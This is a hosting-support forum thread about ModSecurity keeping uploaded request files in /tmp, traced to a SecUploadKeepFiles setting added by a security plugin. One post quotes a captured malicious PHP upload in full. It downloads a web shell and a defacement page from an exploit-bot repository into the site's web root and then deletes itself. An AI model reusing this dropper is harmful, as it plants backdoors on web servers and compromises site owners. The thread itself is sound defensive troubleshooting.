ModSecurity request body on tmp not cleaned

[manoaratefy]

Hello,

I have an issue with ModSecurity. Request body and file temporary file on /tmp isn't completely cleared, so I have to clean up very regularly /tmp to avoid it filling up all my disks. Would you know why it have this strange comportment?

On the apache log, I found only this as relevant:
ModSecurity: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||xxxxxxxx.com|F|2"] [data "Multipart parsing error: Multipart: writing to \\x22/tmp/[email protected]
66X\\x22 failed"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] [hostname "xxxxxxxx.com"] [uri "/wp-json/wp/v2/media"] [unique_id "[email protected]
sxrleqn8PvgAAAc0"], referer: https://xxxxxxxx.com/wp-admin/post-new.php

But I don't know how to interpret this.

Thanks in advance.

 

[cPRex]

Hey hey! I don't think that specific ModSecurity entry is related to the issue with /tmp. It seems like that is just normal processing of ModSecurity and it happened to experience an error, but I don't think that shows us the root of the problem.

Can you run this command on the server and let me know the output:

grep SecDataDir /etc/apache2/conf.d/modsec/modsec2.cpanel.conf

That may let us know what the issue could be, or at least point us in the right direction.

 

[grindlay]

Same/similar issue here. I have 1000s of files in /tmp of this format:
YYYYMMDD-hhmmss-random27charstring-file-random6charstring
File owner is pretty much any of my cpanel users.
Random sizes - some are binary, some are flagged by Configserver exploit scanner others not.
Sample screen shot attached.
My guess is these are uploaded to /tmp for inspection by modsec, but they just accumulate.
Output of:

> grep SecDataDir /etc/apache2/conf.d/modsec/modsec2.cpanel.conf
SecDataDir "/var/cpanel/secdatadir"

I believe there may be a setting somewhere in modsec to modify this behaviour, but not sure where to look.
Thanks for any help.

 

[cPRex]

That is the default output I would expect to see from that grep command.

If you check one of the files on the system, is it clear that they are coming from ModSecurity and not from some other tool on the machine?

 

[grindlay]

Thanks for the reply.
There is such a diversity of different content - some are plain text, some binary. Quite a few with suspicious content. I can post a few if that would help?

 

[cPRex]

Sure! Just make sure to remove any public info like domains or IPs.

 

[grindlay]

Here's a text-based one:

<title>Vuln!! patch it Now!</title>
<?php
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/vuln.php" ;
$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else
  echo "not exits";
echo "done .\n " ;

$check2 = $_SERVER['DOCUMENT_ROOT'] . "/vuln.htm" ;
$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else
  echo "not exits";
echo "done .\n " ;

@unlink(__FILE__);
?>

 

[cPRex]

Thanks for the details. If these files are owned by the user process itself, I wouldn't expect that to be modsecurity but it could indicate a security issue with the accounts on the system trying to run the code and then not close the temporary session.

 

[grindlay]

Some of the files are legitimate PDFs, others look malicious. I wonder if they're files that are uploaded to /tmp as a part of an http upload process but then quarantined by ImmunifyAV or some other plugin. Investigations continue, thanks!

 

[cPRex]

That part I'm not sure about, but I don't feel like these are something Modsec is creating at this point.

 

[grindlay]

After some digging in my apache error_log, I found the corresponding entries for the files in /tmp.
Here's one example from 12-Feb 2021. It would appear that these are being generated by ModSec:

[Fri Feb 12 18:22:26.483770 2021] [:error] [pid 32281] [client 35.181.51.252:53254] [client 35.181.51.252] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:upload[]. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "65"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: x.php found within FILES:upload[]: x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "**redacted**"] [uri "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"] [unique_id "YCbHYk5MoLRBiYHSvddmFwAAAA0"]

The long string in the file name in /tmp matches the unique_id from the log.
The question then becomes: why are only some of the ModSec 'hits' resulting in a file being left in /tmp?

 

[cPRex]

I checked some more systems on my end and I'm not 100% sure why that would be happening. It would definitely be worth opening a ticket so we could get you more details. If you do that, please post the number here so I can follow along and make sure everyone stays updated.

 

[cPRex]

It looks like Austin created the following article that helps to resolve the issue:

ModSecurity is saving files to the SecUploadDir or SecTmpDir locations on my server but is not removing them which is taking up a large amount of disk space

Symptoms You have found cryptic looking filenames in the temporary directory of your server that look similar to the following: [16:34:22 hostname ~]cPs# ls -lah /tmp | grep "\-file\-"-...

support.cpanel.net

Can you please confirm if that gets things working properly on the system?

 

[grindlay]

I really appreciate the effort you folks are putting into this.
After reading Austin's article and their response to my support ticket, I realised that the setting on my system is here:

grep -R "SecUpload" /etc/apache2/

etc/apache2/conf.d/modsec_vendor_configs/configserver/00_configserver.conf:SecUploadKeepFiles RelevantOnly

That pointed me toward my CXS plugin so I searched their forum and found this post:
https://forum.configserver.com/viewtopic.php?f=26&t=8762&p=24798&hilit=SecUploadKeepFiles#p24798
At some point, the "Relevant Only" directive was added to my config, presumably by the plugin.
I suspect the plugin needs this for correct functioning, so the solution for me is to use tmpwatch or similar to manage the files.
I have cross-posted to the CXS forum:
https://forum.configserver.com/viewtopic.php?f=26&t=8762&p=32261#p32261